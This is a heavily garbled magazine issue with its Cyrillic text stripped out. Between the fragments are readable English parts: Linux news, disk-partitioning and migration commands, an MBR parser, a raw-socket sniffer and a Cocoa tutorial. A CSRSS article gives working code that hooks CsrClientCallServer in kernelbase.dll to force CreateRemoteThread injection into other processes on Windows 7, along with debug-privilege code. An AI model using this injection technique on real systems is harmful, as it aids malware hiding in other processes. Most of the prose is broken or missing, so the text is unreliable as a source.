Nvidia -. nv , , 3D-;
DRBD (Distributed Replicated
Block Device) , RAID-1 ;
Ceph () LogFS ( SSD);
. ,
btrfs Direct I/O,
.
,
, , .
XFS ,
,
.

.
CIFS
. Squashfs
LZO;
/

PCI, USB SCSI-;
. : ( )
( ).

, , ;
DRM- (Direct Rendering Manager,
Digital Rights Management) Intel
H.264 VC1
G45+;
L2TP 3 (RFC
3931);

: make nconfig.
, menuconfig,
;

AppArmor .
AppArmor
SELinux ,
AppArmor ,
. SELinux .
AppArmor , SELinux
;
Tile,

;

OOM Killer (Out of Memory Killer), , .


-,
,
fork-.
2.6.37, 2011,
: Nouveau DRM
,
Radeon DRM Radeon
HD 5000 , , , HD 6000 .
Intel DRM DisplayPort-. , VIA DRM 2.6.37 ,
. ,
Reiser4
; , , ,
.


. , .
DE 2010
. changelog Gnome
, 3.0 ( ,
6 2011). ,
2.30 2.32:


Meego
Nautilus . /
;
GNOME Keyboard Indicator,
;
gnome-system-tools
: ,
;
GNOME Terminal: ,
;
Brasero FileRoller
PackageKit;
Empathy -,
;
- Epiphany gnomekeyring;
IDE Anjuta Python Vala.
Changelog KDE 2010 :
Plasma Netbook ;
Kwin (,
);

;
;
;
Plasma ;
KNetworkManager;
Dolphin ;
Kmail
.
, - k3b 2.0 KDE4
Blu-ray.
KDE 4.6 ( 2011)
:
Kwin;
Nepomuk ;
Plasma ;
PowerDevil v2;
KSnapshot
( ).

,
. OpenSource- Firefox.
netmarketshare.com, 2010
23% . 2010 3.6, 2011 Firefox 4.
FF 3.6:
Acid3 94 100;
15% 3.5;
WOFF.
3.6.2;

Personas;
HTML5- .
FF 3.6 Mozilla
.
,
, .
(3.6.4)
,
. .
Plasma Netbook


Mozilla 2010
: : Sothink Web Video Downloader 4.0 Master
Filer. , ( ),
4600 Windows (
). Mozilla ,
.
Firefox4:
, ;
( Google
Chrome).
- WebM VP8;
,
, .
Mozilla Sync;
64- Linux,
Mac OS X Windows;
JetPack, HTML, CSS
Javascript. XUL,
;
WebGL,
3D- . ;
2D- (,
Vista/Seven. Linux Mac OS X );
App Tab,
.
,
Pin as App Tab;

.
Firefox ,
, Google Chrome/Chromium.
2010 Google Chrome Linux (
5) :
,
JavaScript;
, ;
HTML5, Web Sockets, Drag-and-drop,
GeolocationAPI App Cache.
2010 Chrome :

( Release Early, Release
Often). 6 ,
- :
- Chrome Web Store.
- Google.
Chrome OS. ,
5%
( 30% App Store);
15% ;
Auto-fill.
,
;
.
6 2010 7:
, ;
,
;


OOo 3.3
FileAPI ,
.
Chrome 8 ,
:
2D-
GPU;
WebGL;
;

( , Linux);
:
.

, Ubuntu,
: . 10.04.
, LTS (Long Term Support),
, .

:
. : , , .
LTS-, ;
Nvidia Nouveau;
HAL .
10.10.10 Ubuntu 10.10 :
:
, ,
btrfs, ;
.
, Fluendo. ! , ,
;
Netbook edition Canonical
Unity.

, Canonical

. : , (
) ,
gnome-settings-daemon 100% . ,
.
11.04 ( Natty Narwhal, )
Ubuntu Developer Summit:
GNOME 3.0 (GNOME Shell)
Unity. Netbook edition
Desktop edition CD;
- banshee. , ,
Ubuntu mono (f-spot), .
;
, 2.6.38, X.Org Server 1.10 (
X.Org Server 1.09 1.10),
Mesa 7.10, Radeon X1000 (R500)
R300 Gallium3D;
ARM,
.
Ubuntu, Debian, 2010
. , ,
. ,
2010. ,
:
backports.org backports.debian.org. ,
;
rolling- ()
Debian;
Debian: snapshot.debian.org,
. ,

.
RPM-based , Fedora,
, 13 14 :
Btrfs. Yum ;
Python 3, Python 2.
D;
Spice (Simple Protocol for Independent
Computing Environments) ,
QEMU. ,
.
;
MeeGo;
OpenSCAP. SCAP (Security Content Automation Protocol)
,
. OpenSCAP , SCAP, ,
, oscap-scan
, OVAL XCCDF.
BSD- FreeBSD 2010
: 7.3 8.1. 8.1 :
ZFSv14;
UltraSPARC IV/IV+, SPARC64 V;


SMP PowerPC G5;

Broadcom, Ralink SiS.
BSD- : OpenBSD
4.7 4.8 (, 19 15 ), DragonFlyBSD
2.6 2.8, PC-BSD 8.0 8.1, NetBSD 5.0.2.

/
, , 2010,
Linux .
Linux Google Android
2010 . ,
Android- Apple iPhone
( , ),
Android Market 100 000.
2010 Android 2.2 :
Adobe Flash 10.1;
Microsoft Exchange;
Dalvik JIT, ;
Wi-Fi;
. ,
;
.
2010 Android 2.3.
:
WebM;
;
;
.
Android ,
Linux . ,
1-2 , . ,
Meego Maemo (Linux
Nokia) Moblin (Linux Intel).
Linux Foundation. Android , Meego
( VCS-, BSD). Meego :
, CarPC.
(1.1) :
Linux 2.6.35, GCC 4.5.0;
X.Org 1.9.0.
Meego ;
Qt 4.7 ,
;
Btrfs.
, ;
Zypper, RPM-;
oFono,
ConnMan;
Tracker;
Bluetooth- BlueZ, D-BUS, GStreamer PulseAudio.
,
-.
Meego AppUp,
Intel Moblin. , , , Meego, ,
(Nokia N900 Aava Mobile). , ( ) ;
.
, Meego (Nokia N9)
2011.
KDE.

.

BackTrack.
2.6.34 Fluxbox-. NMAP
: 2010
5.20, 5.30BETA1 5.35DC1
:
UDP-;
100 NSE (Nmap Scripting Engine) ;
600 1300
;
Nping,
;
.
1.4.1 Wireshark (
Ethereal):
80 ;
Python ( *nix, Windows
);
;
JPEG RTP-
Wireshark;
( libpcap 1.0.0 );
( libpcap 1.0.0 ).
- Nikto : 2.1.1-2.1.3.
, :
, ;
2300 RFI (remote file inclusion) ;

;
;
Libwhisker
IDS;
XML- SSL.

2010 Canonical ,
Ubuntu Desktop 12
. .
Linux . 1-2%
.
, 2010
, , Linux
. ,
, Linux (
).z

hatchet maks.hatchet@yandex.ru

, ,

, Linux BSD-
, ,
.
,
. , ,
, Linux-,

,
Linux ,
4 .

:
,
: swap,
, Linux, /home.
Linux-,
. . ,
Linux- , .
-

,
:
, , ,
/home-
, .
, , .
:
gparted, parted,
.
, ,
.
parted. - :
$ sudo apt-get install parted


/home:
$ sudo telinit 1

# umount /home

/home
Linux , LiveCD parted. SystemRescueCD (www.sysresccd.
org,
DVD) .
parted :
$ sudo parted /dev/sda

print,
.

( ),
,
(
, , , 62,9GB).
resize _.
Start
<Enter>, End ,
2010 , 63

(,
62,8GB). quit
.
. ,
,
LiveCD parted
.
The second way uses fdisk and resize2fs from e2fsprogs (they handle Ext2, Ext3 and Ext4). Boot a LiveCD and list the partitions:

# fdisk -l

Find the partition that holds /home and check its file system first (/home is /dev/sda7 here):

# fsck -n /dev/sda7

If /dev/sda7 is clean, start fdisk:

# fdisk /dev/sda

Press 'd' (delete) and give the partition number (/dev/sda7 = 7). Then 'n', 'l' (new logical partition); for the first sector enter the value shown by fdisk -l, and press <Enter> for the last sector (fdisk proposes the end of the free space, so the partition takes all of it). 'p' prints the table to check it, 'w' writes it. Reboot into the LiveCD again, check the file system, and grow it to the size of the partition:

# fsck -f /dev/sda7
# resize2fs /dev/sda7

Check once more and reboot:

# fsck -n /dev/sda7
# reboot
UUID


.
,
,
,
. ,
, .

,
.
Linux
: unionfs, aufs2 mhddfs.
, ,
, aufs2
. mhddfs (Multi-HDD FileSystem, mhddfs.
uvw.ru) fuse- ,
,
.
,
, . ,
,
(
).
/mnt/disk1, /mnt/disk2 /mnt/disk3,
Music. :

/home/vasya/Music. unionfs :

INFO

In Ubuntu /etc/fstab refers to partitions by UUID; blkid shows the UUID of a partition:

$ sudo blkid /dev/sda1

dd prints no progress by itself; send it SIGUSR1 from another terminal to make it report, for example once a minute:

$ sudo watch -n60 killall -SIGUSR1 dd

With unionfs the mount looks like this:

$ sudo mount -t unionfs -o dirs=/mnt/disk1/Music=rw:/mnt/disk2/Music=rw:/mnt/disk3/Music unionfs /home/vasya/Music

With aufs2:

$ sudo mount -t aufs none /home/vasya/Music -o br:/mnt/disk1/Music=rw:/mnt/disk2/Music=rw:/mnt/disk3/Music=rw,create=mfs,sum

And with mhddfs:

$ sudo apt-get install mhddfs
$ sudo mhddfs /mnt/disk1/Music,/mnt/disk2/Music,/mnt/disk3/Music /home/vasya/Music -o mlimit=10G

Shrinking an NTFS partition
1. Install ntfsprogs:

$ sudo apt-get install ntfsprogs

2. Unmount the NTFS partition:

$ sudo umount /dev/sda1

3. Shrink the file system:

$ sudo ntfsresize -s 10000M /dev/sda1

4. With fdisk delete the NTFS partition and create it again with a size of 10000 MB (not smaller);
5. Boot Windows and let it check the disk.

[Screenshot: GParted]

With aufs the option create=mfs puts every new file on the branch with the most free space, and sum reports the total size of all branches as the size of the union. The 10G limit of mhddfs means that a new file goes to the next disk once the current one has less than 10 GB free. To mount the union at boot, add it to /etc/fstab:

none /home/vasya/Music aufs br:/mnt/disk1/Music=rw:/mnt/disk2/Music=rw:/mnt/disk3/Music,create=mfs,sum 0 0

Moving the system to a new disk

What if you want to move the installed system, with all its settings, to a new disk? Linux makes this easy: the file system is just files, and the only things that refer to a particular disk are /etc/fstab and the boot loader. The procedure below is for Ubuntu 10.10 but works the same way on any distribution; it assumes the new disk is already connected.

1. Boot from a LiveCD.
2. Partition the new disk. Ubuntu by default makes only root and swap; here we create three partitions (with cfdisk or gparted): root, /home and swap.
3. Mount the old and the new partitions (/dev/sda is the old disk, /dev/sdb the new one):

# mkdir /mnt/{root1,root2,home1,home2}
# mount /dev/sda1 /mnt/root1
# mount /dev/sdb1 /mnt/root2
# mount /dev/sda2 /mnt/home1
# mount /dev/sdb2 /mnt/home2

4. Copy the files:

# cp -ax /mnt/root1/* /mnt/root2
# cp -ax /mnt/home1/* /mnt/home2

5. To fix /mnt/root2/etc/fstab and install grub we chroot into /mnt/root2; first bind /dev and /proc into it:

# mount --bind /dev /mnt/root2/dev
# mount --bind /proc /mnt/root2/proc

6. Inside the chroot (chroot /mnt/root2) edit /etc/fstab:

# vi /etc/fstab
/dev/sda1 / ext4 errors=remount-ro 0 1
/dev/sda2 /home ext4 defaults 0 2
/dev/sda3 none swap sw 0 0

/dev/sda1, /dev/sda2 and /dev/sda3 here assume that the new disk will replace the old one and become /dev/sda; if it stays /dev/sdb, write /dev/sdb.
7. Install grub (grub2):

# grub-mkdevicemap
# grub-mkconfig > /boot/grub/grub.cfg
# grub-install /dev/sdb

8. Leave the chroot with exit, unmount everything, shut down, swap the disks and boot.
,
,
,
, . , dd
.

2010


Western Digital,
512 4 ( Advanced
Format). , ,
.
, , Linux, BSD WinXP/
Win2k3, ,
( 3-/4-
).
WD : Windows- WD Align,
512 (
)
;
,
X 01 (144) 2011

Grub2



To copy a disk to another machine, start the receiving side first:

# netcat -l -p 1234 | dd of=/dev/sdb bs=4k

and then the sending side:

# dd if=/dev/sda bs=4k | netcat <receiver-ip> 1234

dd copies every sector, used or not, so first fill the free space of each file system with zeros; the stream then compresses well (gzip on both ends, for example):

# mount /dev/sda1 /mnt
# dd if=/dev/zero of=/mnt/zero bs=4k
# rm -f /mnt/zero

Partitions on 4 KB-sector disks

The disk still reports 512-byte sectors, so the partitioning tools see nothing special and the alignment has to be done by hand. In Linux the problem is the start of the first partition: the old tools (fdisk, cfdisk) put it at sector 63, which is not a multiple of 8, so every 4 KB block of the file system straddles two physical sectors.

Start the first partition at sector 64 instead (64 x 512 = 32 KB, a multiple of 4 KB). Use fdisk in sector mode ('-u'):

# fdisk -u /dev/sdb

Press 'n' (new partition), 'p' (primary), '1' (first), enter 64 as the first sector (the default is still 63), accept the proposed last sector, and 'w' to write. Then create the file system and mount it:

# mkfs.ext4 /dev/sdb1
# mount /dev/sdb1 /mnt

,
. ,
,
WD , , WinXP
, .
.
. ,
63
( , 20
, ,
).
, ,

. cfdisk
,
parted "--align optimal",
.

, , , , ,
. ,
, . z
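An added example, not from this article or the malware review before it, that serves two passages of this issue at once: the TDL4 description (a bootkit replaces the MBR boot code and keeps its hidden file system in the unused sectors at the end of the disk) and the Advanced Format discussion above (a partition is aligned only if its first byte lies on a 4096-byte boundary). Both checks need the same thing, a parser for the MBR partition table, so they share one. parse_mbr reads the four primary entries and insists on the 0x55AA signature; alignment_report says which partitions start on a physical-sector boundary; unallocated_tail measures the gap after the last partition; boot_code_digest hashes the 440 bytes of boot code so a value recorded at install time can be compared later. The MBRs in the test are constructed with build_mbr, not taken from a real disk, and the hidden-file-system location is a heuristic, not proof of infection.

```python
import hashlib
import struct

SECTOR = 512
# one partition entry: status, CHS start, type, CHS end, LBA start, sector count
ENTRY = struct.Struct("<B3sB3sII")


def parse_mbr(mbr):
    """Partition entries of a 512-byte MBR; raises if the 0x55AA signature is missing."""
    if len(mbr) != SECTOR or mbr[510:512] != b"\x55\xaa":
        raise ValueError("not an MBR: bad length or missing 0x55AA signature")
    parts = []
    for i in range(4):
        status, _, ptype, _, start, count = ENTRY.unpack_from(mbr, 446 + 16 * i)
        if ptype != 0 and count != 0:               # skip empty slots
            parts.append({"index": i + 1, "bootable": status == 0x80,
                          "type": ptype, "start": start, "count": count})
    return parts


def alignment_report(parts, physical=4096, logical=512):
    """partition number -> True if it starts on a physical-sector boundary."""
    return dict((p["index"], (p["start"] * logical) % physical == 0) for p in parts)


def unallocated_tail(parts, disk_sectors):
    """Sectors after the end of the last partition. TDL4 keeps its hidden file
    system and the saved original MBR in this area, so a large unexplained tail
    on a disk that was fully partitioned is worth a closer look (heuristic)."""
    if not parts:
        return disk_sectors
    last_end = max(p["start"] + p["count"] for p in parts)
    return max(disk_sectors - last_end, 0)


def boot_code_digest(mbr):
    """SHA-256 of the boot code (the 440 bytes before the disk signature).
    Record it on a clean system; a bootkit replaces exactly this code."""
    return hashlib.sha256(mbr[:440]).hexdigest()


def build_mbr(entries, boot_code=b"\xeb\xfe" + b"\x00" * 438):
    """Constructed test data: an MBR from (bootable, type, start, count) tuples."""
    table = b""
    for bootable, ptype, start, count in entries:
        table += ENTRY.pack(0x80 if bootable else 0, b"\0\0\0", ptype, b"\0\0\0", start, count)
    table += b"\x00" * (64 - len(table))
    return boot_code + b"\x00" * 6 + table + b"\x55\xaa"
```

On a live system the 512 bytes come from reading /dev/sda (or \\.\PhysicalDrive0) at offset 0, and the disk size in sectors from the block device; the functions themselves never touch hardware, which is why they can be run against an image taken from a suspect machine.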


CODING
stann ic.man@gmail.com

CSRSS

, Windows 7

: Windows, Microsoft ,
.
, ,
!
, , ,
- CSRSS,
,
, . ,
, .
, , Nimda. , ,

CSRSS , CSRSS ,
. ,
.

CSRSS client/server run-time subsystem ( )


Windows, , /
16- MS-DOS.
, , , CSRSS
.
, Windows.
, ,
CSRSS.EXE ,


, .
(!) BSOD, Windows,
: 0x0000004C (FATAL_UNHANDLED_HARD_
ERROR) 0xC000021A (STATUS_SYSTEM_PROCESS_TERMINATED)
(winlogon.exe
csrss.exe). Windows
. , , csrss.exe (
, ),
, (
).
CSRSS is started with a command line like this; the ServerDll parameters name the DLLs that implement the subsystem:

%SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,3072,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ProfileControl=Off MaxRequestThreads=16

[Figure: the layers between a Win32 call and CSRSS. Win32 API level: kernel32.dll, user32.dll. Native Csr interface: CsrClientConnectToServer, CsrClientCallServer, CsrGetProcessId, Csr~. Native LPC API: NtConnectPort, NtCompleteConnectPort, NtRequestWaitReply, NtReplyWaitRequest, NtReplyPost, Nt~Port.]

, , CSRSS -

. ,
, .

LPC, Local Procedure Calls

, CsrApi, LPC, Windows


.
? , CSRSS
LPC. LPC Local InterProcess Communication. , ,
, LPC,
MSDN- LPC Local Procedure Calls, , .
, LPC Windows, ,
/ .
, .
LPC ( ) (
LPC). ,
ring-,
(r0),
(r3).
LPC- ( PORT_MESSAGE).
LPC : (NtCreatePort,
NtConnectPort, NtListenPort ..)
(NtRequestWaitReplyPort .).


, kernel32!CreateProcess,
kernel32!AllocConsole, kernel32!FreeConsole,
user32!EndTask .
Open any of them in IDA and you will see that sooner or later they call CsrClientCallServer, with the request number among the arguments, for example:

.text:77E96D55    PUSH    4
.text:77E96D57    PUSH    20225h            ; API number: server DLL index 2, function 225h
.text:77E96D5C    MOV     [EBP+var_7C], EAX
.text:77E96D5F    PUSH    0
.text:77E96D61    LEA     EAX, [EBP+var_A4]
.text:77E96D67    PUSH    EAX
.text:77E96D68    CALL    CsrClientCallServer

The call travels over LPC to csrss.exe, where CsrApiRequestThread dispatches it to the handler in the right server DLL. Very little in Windows bypasses CSRSS this way. Is CsrApi documented? No: MSDN says nothing about it, and the prototypes used below come from reverse engineering, even though practically all of WinAPI rests on these calls.

The PoC source is on the magazine DVD. A request to the console server asking for the console title (console API number 38):

int main(int argc, char* argv[])
{
    NTSTATUS Status;
    CSR_API_MSG m;
    CONSOLE_TITLE_MSG *consoleTitleMes = &m.u.ConsoleTitle;
    CSR_CAPTURE_HEADER *CaptureBuffer;

    consoleTitleMes->ConsoleHandle = GetConsoleHandle();   // the PoC's own helper
    consoleTitleMes->TitleLen = 260;
    consoleTitleMes->Unicode = 0;

    // the title comes back through a capture buffer that CSRSS can write to
    CaptureBuffer = (CSR_CAPTURE_HEADER *)CsrAllocateCaptureBuffer(1, consoleTitleMes->TitleLen);
    CsrCaptureMessageBuffer(CaptureBuffer, NULL, consoleTitleMes->TitleLen,
                            (PVOID *)&consoleTitleMes->Title);

    Status = CsrClientCallServer((PCSR_API_MSG)&m, CaptureBuffer,
                                 CSR_MAKE_API_NUMBER(CONSRV_SERVERDLL_INDEX,
                                                     CONSRV_FIRST_API_NUMBER + 38),
                                 sizeof(m));
    printf("ConsoleTitle is : %s\n", m.u.ConsoleTitle.Title);
    return 0;
}

So the CsrApi call goes through CsrClientCallServer, and that is the entry point for everything!


,
CsrApi- , .

, CSRSS? , . , Windows 7.
, Windows 7

CreateRemoteThread . ,
, Microsoft ,
. CreateRemoteThread ,
, NULL
ERROR_NOT_ENOUGH_MEMORY.
:).
, RtlCreateUserThread (
: http://forum.gamedeception.net/threads/17097-Simpleinjector-(cmd-line-unicode-xp-vista-w7)),
; .
CSRSS,

status quo
. PoC . ,
CreateRemoteThread
CsrClientCallServer, . ,
. CreateRemoteThread NtCreateThreadEx,
CREATE_SUSPENDED,
CSRSS
CsrClientCallServer. ?
:) , , CsrClientCallServer
. .
kernelbase.dll ( kernel32.dll Windows 7, ):
kernelbase.dll
.text:7597BD24    PUSH    0C
.text:7597BD26    PUSH    10001
.text:7597BD2B    PUSH    EBX
.text:7597BD2C    LEA     EAX, DWORD PTR SS:[EBP-210]
.text:7597BD32    PUSH    EAX
.text:7597BD33    CALL    NEAR DWORD PTR DS:[<&ntdll.CsrClientCallServer>]   ; ntdll.CsrClientCallServer
.text:7597BD39    MOV     EAX, DWORD PTR SS:[EBP-1F0]
.text:7597BD3F    MOV     DWORD PTR SS:[EBP-218], EAX
.text:7597BD45    CMP     DWORD PTR SS:[EBP-218], EBX
.text:7597BD4B    JL      KERNELBA.75999564

After the call kernelbase.dll reads the status out of the message it passed in EAX (EBP-210 is the CSR_API_MSG, EBP-1F0 is its ReturnValue field at offset 0x20) and, if it is negative (JL; EBX is zero here), takes the error path. So the trick is to hook CsrClientCallServer in the import table of kernelbase.dll with a replacement that zeroes that field and returns success:

ULONG NewCsrClientCallServer(PVOID Arg1, PVOID Arg2, ULONG Arg3, ULONG Arg4)
{
    // Arg1 is the CSR_API_MSG; 0x20 is the offset of ReturnValue,
    // the field kernelbase checks after the call
    *(DWORD *)((BYTE *)Arg1 + 0x20) = 0;
    return 0;
}

...
DWORD ImportAddress;
DWORD OriginalCsrClientCallServer, OldProtect;
// GetImportAddressFromIat is the PoC's own helper: it walks the import table of the
// module and returns the address of the IAT slot for the named import
ImportAddress = GetImportAddressFromIat(GetModuleHandle("kernelbase.dll"), "CsrClientCallServer");
VirtualProtect((VOID *)ImportAddress, sizeof(DWORD), PAGE_EXECUTE_READWRITE, &OldProtect);
OriginalCsrClientCallServer = *(DWORD *)ImportAddress;
*(DWORD *)ImportAddress = (DWORD)NewCsrClientCallServer;
...

That's it! Nothing else is needed: CsrClientCallServer now always reports success, and CreateRemoteThread works again.

To be clear, this is not a vulnerability and not a 0day: the CSRSS call is merely skipped, the thread is still created by NtCreateThreadEx as before, and the code has to be able to open the target process in the first place. For foreign processes that means debug privileges, which the PoC enables like this:

unsigned long GetDebugPrivileges()
{
    HANDLE hToken;
    TOKEN_PRIVILEGES tokenPrvlgs;
    // error and success are constants defined elsewhere in the PoC

    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken))
        return error;
    if (!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tokenPrvlgs.Privileges[0].Luid))
        return error;
    tokenPrvlgs.PrivilegeCount = 1;
    tokenPrvlgs.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    if (!AdjustTokenPrivileges(hToken, FALSE, &tokenPrvlgs, 0, NULL, NULL))
        return error;
    CloseHandle(hToken);
    return success;
}

, . Windows 7,
. , ,
, . , !
P.S. CSRSS!
:). z

WEXLER.HOME 902

, ,
.
, .
, , . ?
? , !
. . WEXLER.
HOME 902 ,
.

WEXLER.HOME 902 Intel Core i7-970 3,2


- 12 . CPU
Turbo Boost, . , :
- , .
WEXLER.HOME 902 GeForce GTX 460,
Fermi.
DirectX 11 GTX 460
, NVIDIA 3D Vision, PhysX CUDA ,
.
WEXLER.HOME 902
12 . . , , ,
. ,

,
.
. WEXLER.HOME 902 700 ,
.

WEXLER.HOME 902
Windows 7 .
64- :
12 . , Microsoft Office
Microsoft Security Essentials. World of Tanks, 4099 .

,
, .
: www.wexler.ru

CODING
seva@vingrad.ru

GUI

Mac OS X

Mac OS X Objective-C
Cocoa. , ,
.
GUI- Cocoa Objective-C.
Code


, XCode,
Mac OS X Apple. ,
: , ,
..
Interface Builder.
, XCode 4 Interface Builder
, - ,
XCode Apple Interface Builder
IDE, , .
, XCode 4 ( ,
.. , . .) ,


, XCode Interface Builder .


GUI-
.


, . , ,
, :
, , , ,
.., ..

Cocoa
MainMenu.xib Interface Builder
,
XCode , , . ,
IDE. , , command-line , , , kext,
iOS.
XCode
. , , , .
XCode ( XCode ,
Apple).
, , File
New Project. ,
. Cocoa Application ,
Cocoa.
, , XCode
.
:

#import <Cocoa/Cocoa.h>

int main(int argc, char *argv[])
{
    // hands control to the application object; the UI comes from the nib
    return NSApplicationMain(argc, (const char **)argv);
}

NSApplication.
. (
)
.
(Build Build and
Go), . ?
? .
- NIB Files ( -, NIB Files
Interface Buildera) MainMenu.xib.
Interface Builder,
, Mac OS
X .
. IB .
,
. Tools Library (,
, XCode, Interface Builder)
,
drag-and-drop.
, .
,
. -
:).
(Tools
Inspector). ,
.
.
, . , , ,
Interface Builder. ?
, ,
? -
... .
- .
.
XCode ( , Interface
Builder?) AppConroller (File New
File Cocoa Objective-C class). XCode
AppController.h AppController.m . Interface Builder
AppController ,
AppController.
AppController.h InterfaceBuilder.
. - - . ! ,
. Interface Builder Tools Library
Object .
,
AppController.
MainMenu.xib,
, , ,
.

, ,
, .


AppController

// AppController.h
#import <Cocoa/Cocoa.h>

@interface AppController : NSObject
{
    // Outlets: the three text fields the controller works with.
    // They are connected to the controls in Interface Builder.
    IBOutlet NSTextField * FirstNumber;
    IBOutlet NSTextField * SecondNumber;
    IBOutlet NSTextField * Result;
}
// Action: connected to the button in Interface Builder
- (IBAction) buttonClick: (id) sender;
@end

// AppController.m
#import "AppController.h"

@implementation AppController

// called when the button is pressed
- (IBAction) buttonClick: (id) sender
{
    // read both numbers, add them and show the sum in the Result field
    [Result setIntValue:
        [FirstNumber intValue] +
        [SecondNumber intValue]];
}
@end

IBOutlet IBAction,
, . , ,
Interface Builder Outlet ( ) Interface
Builder Action , GUI. , ,
Interface Builder. :
. AppController
InterfaceBuilder;
. ,
IBAction .
, - .

,

2D-,
-
Build and Go (. ).
, : Cocoa
, , ,
. (
).

, ,
. , ? -
? , :).
Mac OS X , ,
Cocoa.
Mac OS X Quarz. , 2D-,
-, NSView.
drawRect .
XCode MyView.h MyView.m .
MyView.h
Interface Builder. Library
CustomView, MyView .
(
).
.
- , -.
(path) .
Cocoa- NSBezierPath (. ).

, GUI Cocoa-.
iOS iPhone iPad
,
, . ! z
It works!

MyView

// MyView.m: XCode generates the initWithFrame: and drawRect: stubs,
// everything inside drawRect: is ours.
#import "MyView.h"

@implementation MyView

// generated by XCode, nothing to do here :)
- (id)initWithFrame:(NSRect)frame {
    self = [super initWithFrame:frame];
    if (self) {
        // Initialization code here.
    }
    return self;
}

// called whenever the view has to be redrawn;
// all the 2D drawing happens here
- (void)drawRect:(NSRect)rect
{
    // background
    [[NSColor grayColor] set];
    NSRectFill( rect );

    // the big circle: white fill, black 2-point outline
    NSBezierPath * circle =
        [NSBezierPath bezierPathWithOvalInRect: rect];
    [circle setLineWidth: 2.0];
    [[NSColor whiteColor] set];
    [circle fill];
    [[NSColor blackColor] set];
    [circle stroke];

    // centre of the view and the centres of the two small circles;
    // the radius is the smaller of the two half-dimensions
    float center_x = rect.size.width / 2.0;
    float center_y = rect.size.height / 2.0;
    NSPoint center = {center_x, center_y};
    NSPoint center_up = {center_x, center_y * 0.5};
    NSPoint center_dn = {center_x, center_y * 1.5};
    float radius = center_x < center_y ? center_x : center_y;

    // the black half, built from three arcs
    NSBezierPath * black_side =
        [NSBezierPath bezierPath];
    // half of the big circle
    [black_side appendBezierPathWithArcWithCenter: center
                                           radius: radius
                                       startAngle: 90
                                         endAngle: 270
                                        clockwise: YES];
    // small circle at center_up
    [black_side appendBezierPathWithArcWithCenter: center_up
                                           radius: radius / 2
                                       startAngle: 270
                                         endAngle: 90
                                        clockwise: NO];
    // small circle at center_dn
    [black_side appendBezierPathWithArcWithCenter: center_dn
                                           radius: radius / 2
                                       startAngle: 270
                                         endAngle: 90
                                        clockwise: YES];
    [[NSColor blackColor] set];
    [black_side fill];

    // the black dot in the white half
    [[NSBezierPath bezierPathWithOvalInRect:
        NSMakeRect(center_x - radius / 6.0,
                   center_y - radius * (0.5 + 1/6.0),
                   radius / 3.0, radius/3.0)] fill];
    // the white dot in the black half
    [[NSColor whiteColor] set];
    [[NSBezierPath bezierPathWithOvalInRect:
        NSMakeRect(center_x - radius / 6.0,
                   center_y + radius * (0.5 - 1/6.0),
                   radius / 3.0, radius/3.0)] fill];
}
@end

c0n Difesa condifesa@gmail.com, http://defec.ru

(, ),
- ( ),

. +
,
.

, .
, , Wireshark: ,
TCP-,
,

. ,
, CommView.
, , ,
. Wireshark
PCAP (Packet Capture),
. ,
, .

CommView,
NDIS-,
.
,
, .

,
. ,
- , ,
, .


. ,
, -




, ,

,
, ,

.


.
,
,

,
.

,

,
, .
,
, , ,
-
, , . ,

. ,

, ,
.
, ,
, .

+ = ?

.
-, , :
;


(
PCAP );
( );
- ;
;
,
.

(
,

, ).

,

.
-, ,
-
,
. ,
, -
, .
, , -,
,
.



.

links
http://defec.ru/wtf_wcf: Windows Communication Foundation, what it is and how to use it.
www.xakep.ru/post/16494/: a sniffer on PCAP.
www.codeproject.com/KB/IP/CSNetworkSniffer.aspx: a (simple) network sniffer in C#.
www.xakep.ru/magazine/xa/135/096/1.asp: the article on .NET Remoting.

The server side is built on Windows Communication Foundation from the .NET Framework (see the WTF WCF?! article on Windows Communication Foundation); the sensor is written in C#.

DVD
The sources are on the disc; the transport between sensor and server is .NET Remoting.


IPv4 Header

IP-
.
IP-, IOControl
ReceiveAll,
,
.


, .

:
TCP;
UDP;
IP;
DNS.
, HTTP, SMTP, FTP TCP, , ,
IP: ,
,
.
(raw socket), -


// raw socket for IP
mainSocket = new Socket(
    AddressFamily.InterNetwork,
    SocketType.Raw, ProtocolType.IP);
// bind to the selected interface (by its IP address)
mainSocket.Bind(new IPEndPoint(
    IPAddress.Parse(cmbInterfaces.Text), 0));
/* we want the IP header included in what we receive */
mainSocket.SetSocketOption(
    SocketOptionLevel.IP,
    SocketOptionName.HeaderIncluded,
    true);
// SIO_RCVALL: deliver every IP packet that arrives on this interface
mainSocket.IOControl(
    IOControlCode.ReceiveAll,
    byTrue,   // input: 1, switch it on
    byOut);   // output buffer
// start receiving asynchronously; OnReceive is called for each packet
mainSocket.BeginReceive(byteData, 0,
    byteData.Length, SocketFlags.None,
    new AsyncCallback(OnReceive), null);

The packets are taken apart by three classes: IPHeader, DNSHeader, TCPHeader. The skeleton of IPHeader:

public class IPHeader
{
    /* fields of the IP header, filled from the raw bytes */

    /* the remaining bytes: the payload of the IP packet */

    public IPHeader(byte[] byBuffer, int nReceived)
    {
        // parse the header out of byBuffer
    }
}

Nodes are added to the tree view from the receiving thread through a delegate:

AddTreeNode addTreeNode = new AddTreeNode(OnAddTreeNode);

TCP
UDP: , IP-.
,
- , ( ,
RFC).
, .
(,
) ,

, , ,
,
. . ,

:
/* builds the tree node that describes an IP header */
private TreeNode MakeIPTreeNode(IPHeader ipHeader)
{
    // the root node for this header
    TreeNode ipNode = new TreeNode();
    // child nodes for the individual fields go here

    return ipNode;
}
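An added example, not the sniffer's C# code: the parsing that IPHeader and TCPHeader do, written in Python so it can be run offline against a byte string. It shows the part a security sensor must get right and the article only sketches: decode the fixed header with the right byte order, trust Total Length and IHL only after checking them against the bytes actually received (a raw socket happily hands you truncated or malformed packets), verify the IP header checksum, and only then hand the payload to the next layer. dissect returns nested dictionaries in the shape of the article's tree nodes. The packet in the test is constructed with build_ipv4_tcp, not captured from a network.

```python
import socket
import struct


def ones_complement_sum(data):
    """RFC 1071 checksum over 16-bit big-endian words; 0 means 'verifies'."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def parse_ipv4(pkt):
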